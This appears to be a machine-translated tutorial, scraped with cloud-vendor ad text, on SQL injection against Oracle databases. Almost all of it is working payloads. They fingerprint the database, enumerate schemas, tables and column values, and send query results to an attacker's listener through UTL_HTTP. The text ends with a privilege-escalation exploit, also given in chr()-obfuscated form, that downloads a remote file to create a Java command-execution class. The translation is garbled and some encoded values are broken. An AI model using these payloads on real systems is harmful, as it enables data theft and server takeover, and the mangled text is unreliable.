Determine whether the database is an Oralce database:
And 0 <> (select count (*) from dual) returns the normal page, which is represented as an Oracle database.
Number of fields to be guessed:
Use order by or group by to submit numbers one by one to know the echo error page
List the number of fields, for example, the number of 6 fields.
And 1 = 1 null, null from dual-
Because the ORACLE database does not automatically match the data type, and null can match any data type, no error will be reported for submission. Submit it and return the normal page.
Check the Data Type of the current field, and add 'null' quotation marks before and after null. If the returned result is normal, the field is in numeric type. If the returned result is incorrect, it may be numeric type. If the returned result is not numeric type, other Types
For example, the submit Statement: and 1 = 1 union select null, 'null', null, 'null', 'null' from dual-
Read the Oracle database version:
Replace the echo number with and 1 = 2 union select 1, (select banner from sys. v _ $ version where rownum = 1), 3, '4', 5, '6' from dual-
Username for reading the current Oracle database connection:
And 1 = 2 union select 1, (select SYS_CONTEXT ('userenv', 'current _ user') from dual), 3, '4', 5, '6' from dual-
Read the operating system version of the current website:
And 1 = 2 union select 1, (select member from v $ logfile where rownum = 1), 3, '4', 5, '6' from dual-
Determine whether the UTL_HTTP package exists:
Select count (*) from all_objects where object_name = 'utl _ http'
Use UTL_HTTP injection:
Use 'and UTL_HTTP.request ('HTTP: // IP: 2009/'| (query statement) = 1-in the local NC listener. local nc-l-vv-p 2009, and then submit
'And UTL_HTTP.request ('HTTP: // IP: 2009/' | (select banner from sys. v _ $ version where rownum = 1) = 1-
Database explosion:
'And UTL_HTTP.request ('HTTP: // ip: 2009/' | (select owner from all_tables where
Rownum = 1) = 1-the first database is exposed.
'And UTL_HTTP.request ('HTTP: // IP: 2009/' | (select owner from all_tables where
Owner <> 'first database name' and rownum = 1) = 1-
'And UTL_HTTP.request ('HTTP: // IP: 2009/' | (select owner from all_tables where
Owner <> 'second database name' and owner <> 'first database name' and rownum = 1) = 1-
Burst table:
And UTL_HTTP.request ('HTTP: // IP: 2009/'| (select TABLE_NAME from all_tables
Where owner = 'database name' and rownum = 1) = 1-
And UTL_HTTP.request ('HTTP: // IP: 2009/'| (select TABLE_NAME from all_tables
Where owner = 'database name' and rownum = 1 and TABLE_NAME <> 'first table name') = 1-
And UTL_HTTP.request ('HTTP: // IP: 2009/'| (select TABLE_NAME from all_tables
Where owner = 'database name' and rownum = 1 and TABLE_NAME <> 'first table name' and TABLE_NAME <>'
The second table name ') = 1-
Pop-up table:
'And UTL_HTTP.request ('HTTP: // IP: 2009/' | (select count (*) from user_tab_columns where table_name = 'table name') = 1-first table column name
Or
'And UTL_HTTP.request ('HTTP: // IP: 2009/'| (select * from user_tab_columns where table_name = 'table name' and rownum = 1 )) = 1-name of the first table column
And UTL_HTTP.request ('HTTP: // IP: 2009/'| (select * from user_tab_columns where table_name = 'table name' and rownum = 1 and COLUMN_NAME <> 'first column name') = 1-
Field Value:
'And UTL_HTTP.request ('HTTP: // IP: 2009/' | (select Table segment from table name where rownum = 1) = 1-
And UTL_HTTP.request ('HTTP: // IP: 2009/'| (select Table segment from table name where rownum = 1 and Table segment <> 'first table segment value') = 1-
Use the SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES function to obtain system permissions:
'And
SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); utl_http.request
('HTTP: // www.xx.com/1.txt') END;-', 'sys', 0, '1', 0) = 0-
If this page is returned after submission, it cannot be displayed. Replace it with char () and
SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (chr (39) | chr (70) | chr
(79), chr (79) | chr (39) | chr (44), chr (39) | chr (66) | chr (65) | chr (82) | chr (39)
| Chr (44) | chr (39) | chr (68) | chr (66) | chr (77) | chr (883) | chr (95) | chr (79)
| Chr (85) | chr (84) | chr (80) | chr (85) | chr (84) | chr (40) | chr (58) | chr (80) | chr
(49) | chr (41) | chr (59) | utl_http.request (chr (39) | chr (104) | chr (116) | chr
(116) | chr (112) | chr (58) | chr (47) | chr (47) | chr (119) | chr (119) | chr (1, 119) | chr
(46) | chr (108) | chr (105) | chr (45) | chr (116) | chr (101) | chr (107) | chr (46) | chr
(99) | chr (111) | chr (109) | chr (47) | chr (49) | chr (46) | chr (116) | chr (1, 120) | chr
(116) | chr (39) | chr (69) | chr (78) | chr (68) | chr (59) | chr (45) | chr (45) | chr
(39), chr (39) | chr (83) | chr (89) | chr (83) | chr (39), 0, chr (39) | chr (49) | chr
(39), 0) = 0-
The content of remote address 1.txt is:
Execute immediate 'declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE
IMMEDIATE "Create or replace and resolve java source named" JAVACMD"
Import java. lang. *; import java. io. *; public class JAVACMD {public static void
ExecCommand (String command) throws IOException {Runtime. getRuntime
(Cmd.exe c (command) ;}}; "; END ;'
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
